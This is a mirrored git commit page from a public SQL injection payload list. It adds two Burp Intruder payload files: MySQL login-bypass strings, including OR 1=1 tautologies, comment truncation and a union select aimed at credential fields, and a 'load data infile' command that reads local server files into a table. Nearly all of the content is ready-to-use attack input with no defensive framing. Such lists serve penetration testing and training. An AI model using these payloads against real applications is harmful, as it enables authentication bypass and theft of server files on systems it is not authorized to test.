mirror of
https://github.com/payloadbox/sql-injection-payload-list.git
synced 2025-12-29 16:15:05 +00:00
Intruder Payloads
Add Intruder Payloads
This commit is contained in:
5
Intruder/exploit/MySQL/mysql-injection-login-bypass.txt
Normal file
5
Intruder/exploit/MySQL/mysql-injection-login-bypass.txt
Normal file
@@ -0,0 +1,5 @@
|
||||
<username>' OR 1=1--
|
||||
'OR '' = ' Allows authentication without a valid username.
|
||||
<username>'--
|
||||
' union select 1, '<user-fieldname>', '<pass-fieldname>' 1--
|
||||
'OR 1=1--
|
||||
1
Intruder/exploit/MySQL/mysql-read-local-files.txt
Normal file
1
Intruder/exploit/MySQL/mysql-read-local-files.txt
Normal file
@@ -0,0 +1 @@
|
||||
create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile;
|
||||
Reference in New Issue
Block a user